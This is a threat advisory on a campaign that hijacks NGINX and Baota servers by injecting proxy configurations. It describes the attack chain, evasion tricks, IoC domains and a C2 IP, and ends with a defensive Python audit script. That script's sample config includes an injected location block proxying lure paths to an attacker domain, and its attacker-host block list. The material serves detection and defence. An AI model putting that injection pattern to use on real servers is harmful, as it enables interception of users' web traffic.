Threat actors are actively conducting a sophisticated web traffic hijacking campaign targeting NGINX servers and Baota (BT) hosting management panels across Asia, with particular focus on India, Indonesia, Peru, Bangladesh, Thailand, and China. This operation likely exploits the critical React2Shell vulnerability (CVE-2025-55182) to gain initial access to vulnerable servers, after which attackers deploy a multi-stage shell-based toolkit that automates server compromise, malicious configuration injection, persistence establishment, and intelligence exfiltration. The campaign specifically targets government agencies, educational institutions, and web hosting providers, representing a significant threat to critical infrastructure and sensitive organizational networks.
The attack methodology demonstrates sophisticated understanding of web server architecture and configuration management systems. Threat actors tamper with NGINX configuration files to silently intercept and reroute legitimate website traffic through attacker-controlled proxy infrastructure, enabling traffic manipulation, data interception, and further exploitation capabilities. The operation primarily targets domains with Asian country code top-level domains including .in (India), .id (Indonesia), .pe (Peru), .bd (Bangladesh), and .th (Thailand), as well as Chinese hosting environments. Additionally, the campaign shows particular interest in government and educational domains, suggesting potential intelligence collection or cyber-espionage motivations.
The technical execution involves deployment of an orchestrator script that retrieves additional payloads using standard utilities like curl and wget, but importantly includes fallback mechanisms leveraging Bash’s /dev/tcp feature to send HTTP requests directly when standard download tools are unavailable or restricted. This ensures infection success even in hardened or restricted server environments. The attackers deploy environment-specific scripts tailored for different deployment scenarios: bt.sh targets systems running Baota management panels, 4zdh.sh focuses on conventional NGINX installations, and zdh.sh concentrates on Linux and containerized deployments.
The injected NGINX configurations manipulate web traffic routing based on domain extensions, directing government, education, and Asian domains through specific proxy networks while maintaining separate routing for Indian and Indonesian domains, with a general fallback handling all remaining traffic. To maintain operational stealth and avoid detection, the malicious configurations preserve original request headers so redirected traffic appears legitimate to backend systems, only redirect requests hitting predefined paths that resemble gaming, casino, blog, or support pages to reduce detection probability, and implement hash-based tracking to prevent repeated injections that might trigger anomaly detection. Post-compromise activities include deployment of cryptocurrency mining malware and establishment of reverse shells, demonstrating that attackers pursue both automated resource monetization and maintained interactive control over compromised infrastructure.
The campaign initiates with attackers gaining unauthorized access to exposed NGINX servers, most likely through exploitation of the critical React2Shell vulnerability (CVE-2025-55182), which affects React Server Components and allows remote code execution on vulnerable systems. Once initial access is established, threat actors deploy an orchestrator script named zx.sh that functions as the central command-and-control loader for the entire attack chain. This orchestrator script demonstrates sophisticated operational resilience by retrieving additional payload components using common Unix utilities like curl and wget for standard HTTP downloads.
Critically, the orchestrator includes a fallback mechanism that leverages Bash’s native /dev/tcp pseudo-device feature to send HTTP requests directly when standard download utilities are unavailable, blocked by security controls, or removed from the system. This /dev/tcp technique allows the attackers to establish TCP connections and perform HTTP communications using only built-in shell capabilities, ensuring that the infection chain proceeds successfully even in restricted or hardened server environments where external tools have been removed or blocked by security policies.
After establishing persistent access through the orchestrator, attackers deploy tailored scripts specifically designed to modify NGINX configurations based on the detected server environment and management framework. The bt.sh script specifically targets systems running the Baota (BT) management panel, a popular Chinese server management platform widely used across Asian hosting environments. This script methodically scans Baota-specific configuration directories and injects malicious location blocks that quietly proxy selected web traffic to attacker-controlled backend servers without triggering visible changes in website functionality or user experience.
A more sophisticated script variant named 4zdh.sh focuses on conventional NGINX installations deployed without third-party management panels. This script carefully edits configuration files across multiple standard NGINX directories including /etc/nginx/, /usr/local/nginx/conf/, and other common paths, while implementing configuration validation using the nginx -t command before attempting to reload services. This validation step ensures that injected configurations are syntactically correct and will not cause NGINX service disruption that would alert administrators to the compromise.
Another variant named zdh.sh concentrates specifically on Linux bare-metal and containerized deployments, applying targeted configuration injections optimized for these environments. This script forcefully restarts NGINX services when needed to ensure that configuration changes take immediate effect, demonstrating the attackers’ operational focus on maintaining reliable traffic interception capabilities even at the cost of brief service interruptions that might be attributed to normal administrative activities or system updates.
The injected NGINX configurations implement sophisticated traffic manipulation logic that selectively redirects web requests through attacker-controlled proxy infrastructure based on domain extension analysis and request path matching. The routing decisions are made based on top-level domain analysis: government domains (.gov), educational domains (.edu, .ac), and specific Asian country code domains are funneled through one designated proxy network, while domains from India (.in) and Indonesia (.id) are routed through a separate proxy infrastructure, with a general fallback proxy handling all remaining domain traffic.
To maintain operational stealth and avoid detection by security monitoring systems or suspicious website administrators, the malicious configurations implement several evasion techniques. The configurations preserve original HTTP request headers including Host, User-Agent, Referer, and X-Forwarded-For, ensuring that redirected traffic appears completely legitimate to backend application servers. Only requests hitting predefined URL paths that resemble gaming content, casino pages, blog posts, or support documentation are actually redirected, significantly reducing the volume of redirected traffic and lowering the probability of detection through traffic pattern analysis.
Persistence and anti-reinfection mechanisms are implemented through hash-based tracking files stored in /tmp/.domain_group_map.conf and careful configuration management logic that checks for existing injections before attempting to modify configurations. This prevents the creation of duplicate malicious configuration blocks that would be more likely to be noticed by administrators conducting routine configuration reviews or troubleshooting activities.
In the final operational phase, attackers deploy a reconnaissance script that gathers comprehensive intelligence about all successfully hijacked server configurations and documents the relationships between compromised domains and attacker-controlled proxy infrastructure. This collected data includes details about the number of compromised virtual hosts, traffic volumes being redirected, backend server configurations, and the effectiveness of different injection techniques across various server environments.
The reconnaissance data is systematically exfiltrated to command-and-control servers using authenticated HTTP requests that include operational tokens or credentials, with the data transmission occurring either through standard tools like curl when available or through direct TCP communication using Bash’s /dev/tcp capabilities when standard tools are restricted. The authentication mechanisms ensure that only legitimate attacker infrastructure can receive the exfiltrated intelligence, preventing data interception by third parties monitoring network traffic.
Post-compromise activities extend beyond traffic hijacking to include deployment of cryptocurrency mining malware that monetizes compromised server computational resources, and establishment of reverse shell backdoors that provide interactive command-line access for future operations. These additional payloads demonstrate that attackers pursue multiple monetization and operational objectives simultaneously: automated passive income through cryptocurrency mining, intelligence collection through traffic interception, and maintained access through persistent backdoors for future campaigns or lateral movement operations.
Organizations must conduct immediate and comprehensive audits of all NGINX configuration files across managed server infrastructure, specifically examining location blocks for unauthorized proxy_pass directives pointing to unfamiliar backend domains, unexpected rewrite rules that modify request routing, and suspicious proxy configurations that forward traffic to external infrastructure. Security teams should review configuration files in /etc/nginx/, /usr/local/nginx/conf/, /www/server/panel/vhost/nginx/, and any custom configuration directories, comparing current configurations against known-good baselines or version-controlled configuration repositories.
Organizations must prioritize patching all systems susceptible to the React2Shell vulnerability (CVE-2025-55182), which serves as the primary initial access vector for this traffic hijacking campaign. Security teams should verify patch status across all internet-facing servers running React-based applications, particularly those implementing React Server Components functionality. Organizations should implement vulnerability scanning to identify all systems running vulnerable React versions and establish emergency patching procedures for critical internet-facing infrastructure.
Organizations should deploy file integrity monitoring (FIM) solutions configured with detection rules that alert on any modifications to NGINX configuration files. Monitoring should cover all directories containing configuration files including /etc/nginx/, /usr/local/nginx/conf/, /www/server/panel/vhost/nginx/, and custom configuration paths. Security operations centers should receive immediate alerts on any changes to files with the .conf extension in these critical paths, enabling rapid investigation of potential unauthorized configuration tampering before traffic hijacking becomes operational.
Organizations running Baota management panels must implement strict access controls restricting panel access to trusted IP addresses only, enforce strong authentication credentials combined with multi-factor authentication for all administrative accounts, and ensure panels are updated to the latest version with all available security patches. Security teams should audit Baota panel access logs regularly for unauthorized login attempts, unusual configuration changes, or suspicious administrative activities that might indicate compromise or reconnaissance by threat actors.
Organizations should implement network segmentation and egress filtering policies that prevent web servers from initiating outbound connections to unauthorized external domains or IP addresses. NGINX servers typically should not need to establish connections to arbitrary external hosts for normal operational purposes. Security teams should implement firewall rules that whitelist only necessary outbound connections for legitimate purposes such as package updates from trusted repositories, API communications with authorized third-party services, and log forwarding to internal security infrastructure.
Organizations must implement automated configuration validation workflows that compare NGINX configurations against known-good baselines before allowing any reload or restart operations. Configuration management should be implemented using version control systems such as Git, enabling security teams to track all configuration changes, identify unauthorized modifications, and rapidly roll back malicious changes. Automated validation should include syntax checking using nginx -t, semantic analysis for suspicious proxy directives, and approval workflows for configuration changes in production environments.
Security operations centers should perform deep packet inspection and network traffic analysis to identify anomalous proxy patterns where legitimate user traffic is being unexpectedly routed through intermediary servers before reaching intended backend destinations. Organizations should establish baseline traffic patterns for web applications and implement anomaly detection that alerts on discrepancies between expected direct backend communications and actual traffic flows through unexpected proxy infrastructure. Network security monitoring should specifically look for traffic being routed through the documented malicious domains and IP addresses associated with this campaign.
The web traffic hijacking campaign demonstrates sophisticated adversary tradecraft mapped to multiple MITRE ATT&CK tactics and techniques:
Initial Access: T1190 (Exploit Public-Facing Application) – Attackers likely exploit the React2Shell vulnerability (CVE-2025-55182) to compromise internet-facing NGINX servers.
Execution: T1059.004 (Unix Shell) – The attack chain relies extensively on shell scripts including the zx.sh orchestrator and environment-specific configuration injection scripts.
Persistence: T1505.004 (Server Software Component: IIS Components; applied here to the analogous modification of NGINX web server components) – Attackers establish persistence through malicious NGINX configuration modifications that survive service restarts.
Defense Evasion: T1027 (Obfuscated Files or Information) – The malicious scripts and configurations employ various obfuscation techniques to evade detection.
Discovery: T1083 (File and Directory Discovery), T1082 (System Information Discovery) – Attackers perform extensive reconnaissance of server file systems and configurations to identify NGINX installations, Baota panels, and appropriate injection targets.
Collection: T1557 (Adversary-in-the-Middle) – The core objective of the campaign is traffic interception through malicious proxy configurations that position attackers as man-in-the-middle between legitimate users and backend servers.
Exfiltration: T1041 (Exfiltration Over C2 Channel) – Reconnaissance data about compromised configurations and hijacked domains is exfiltrated to attacker command-and-control infrastructure.
Resource Development: T1583.001 (Acquire Infrastructure – Domains) – Attackers have established proxy infrastructure using multiple domains for traffic interception operations.
The campaign utilizes multiple domains for traffic interception proxy infrastructure including xzz.pier46.com, ide.hashbank8.com, and th.cogicpt.org. Organizations should immediately block network communications to these domains at firewall, web proxy, and DNS security layers. Security teams should review historical web server access logs, NGINX proxy logs, and network flow data for evidence of connections to these domains, which indicate compromised NGINX configurations actively redirecting traffic through attacker-controlled infrastructure.
The threat actors operate command-and-control infrastructure using IP address 158.94.210.227 for payload distribution, reconnaissance data exfiltration, and operational communications. Organizations should block connections to this IP address and investigate any historical communications that may indicate prior compromise or ongoing traffic hijacking operations.
Compromised systems contain the file /tmp/.domain_group_map.conf which serves as a tracking database for injected configurations and prevents duplicate injections. Security teams should search all NGINX servers for this file, as its presence is a definitive indicator of compromise. Additionally, organizations should search for the orchestrator script zx.sh and environment-specific injection scripts bt.sh, 4zdh.sh, and zdh.sh in common temporary directories, web server directories, and writable system locations.
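The configuration audit recommended earlier (unauthorized proxy_pass directives in the advisory's configuration directories) and the indicators just listed can be combined into one check. The following is an added example written for this advisory; it is not code from the advisory or its sources. It parses NGINX location blocks, classifies every proxy_pass upstream against an operator-maintained allowlist (the allowlist, the sample configuration and the hostnames in it are constructed assumptions), marks upstreams that match the published domains and C2 address, notes the path-lure and header-preservation traits the advisory describes, and reports whether the tracking file is present.

```python
"""Audit NGINX configuration for unauthorized proxy_pass targets.

Added example, not from the advisory or its sources. The allowlist and the
sample configuration below are constructed assumptions.
"""
import glob
import os
import re
from urllib.parse import urlsplit

# Domains and C2 address published in the advisory.
KNOWN_BAD_HOSTS = {
    "xzz.pier46.com", "ide.hashbank8.com", "th.cogicpt.org", "158.94.210.227",
}
# Path themes the advisory says the injected location blocks imitate.
LURE_WORDS = ("game", "casino", "blog", "support")
# Configuration directories named in the advisory.
CONFIG_GLOBS = (
    "/etc/nginx/**/*.conf",
    "/usr/local/nginx/conf/**/*.conf",
    "/www/server/panel/vhost/nginx/**/*.conf",
)
# Tracking file the advisory names as a definitive indicator of compromise.
IOC_FILES = ("/tmp/.domain_group_map.conf",)

LOCATION_RE = re.compile(r"\blocation\s+([^{]+?)\s*\{")
PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+([^;]+);")
COMMENT_RE = re.compile(r"#[^\n]*")


def iter_location_blocks(text):
    """Yield (matcher, body) for each location block, tracking nested braces.

    Limitation: a regex matcher that itself contains '{' is not handled, and a
    proxy_pass inside a nested location is reported for both blocks.
    """
    text = COMMENT_RE.sub("", text)
    for m in LOCATION_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1).strip(), text[m.end():i - 1]


def upstream_host(target):
    """Reduce a proxy_pass argument to its host, upstream name or unix socket."""
    target = target.strip().strip("\"'")
    if target.startswith("unix:"):
        return target
    if "://" not in target:
        target = "http://" + target
    return (urlsplit(target).hostname or target).lower()


def classify(host, allowlist):
    """Verdict for one upstream: KNOWN_IOC, allowed, local or UNKNOWN_EXTERNAL."""
    if host in KNOWN_BAD_HOSTS:
        return "KNOWN_IOC"
    if host in allowlist:
        return "allowed"
    if host in ("127.0.0.1", "::1", "localhost") or host.startswith("unix:"):
        return "local"
    return "UNKNOWN_EXTERNAL"


def audit_config(text, allowlist, source="<inline>"):
    """Return one finding per proxy_pass directive found inside a location block."""
    findings = []
    for matcher, body in iter_location_blocks(text):
        for pp in PROXY_PASS_RE.findall(body):
            host = upstream_host(pp)
            findings.append({
                "source": source, "location": matcher, "target": pp.strip(),
                "host": host, "verdict": classify(host, allowlist),
                # Traits the advisory attributes to the injected blocks:
                "path_lure": any(w in matcher.lower() for w in LURE_WORDS),
                "preserves_headers": bool(re.search(
                    r"proxy_set_header\s+(Host|X-Forwarded-For)\b", body)),
            })
    return findings


def scan_files(allowlist, globs=CONFIG_GLOBS):
    """Audit every .conf file under the advisory's configuration directories."""
    findings = []
    for pattern in globs:
        for path in glob.glob(pattern, recursive=True):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(audit_config(fh.read(), allowlist, path))
    return findings


def ioc_files_present(paths=IOC_FILES):
    """Return the tracking-file indicators that exist on this host."""
    return [p for p in paths if os.path.exists(p)]


# Constructed sample: a legitimate local block, a block shaped like the
# advisory's injection, and a proxy to an external host not on the allowlist.
SAMPLE_CONFIG = """
server {
    listen 80;
    server_name www.example.ac.bd;   # constructed hostname
    location / {
        proxy_pass http://127.0.0.1:8080;
    }
    location ~* ^/(casino|game|blog|support) {
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://xzz.pier46.com;
    }
    location /api/ {
        proxy_pass https://api.partner.example;   # constructed, not allowlisted
    }
}
"""
ALLOWLIST = {"backend_pool"}  # constructed: upstream names/hosts the operator knows

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG, ALLOWLIST):
        print(f"{f['verdict']:17} {f['host']:24} location {f['location']!r}"
              + ("  [path lure]" if f["path_lure"] else ""))
    for p in ioc_files_present():
        print("IoC file present:", p)
```

On a real host, replace the sample with `scan_files(ALLOWLIST)` after populating the allowlist from the version-controlled baseline; any KNOWN_IOC verdict, or an UNKNOWN_EXTERNAL upstream paired with a lure-style path matcher, is the pattern described above and warrants pulling the file for review before any further reload.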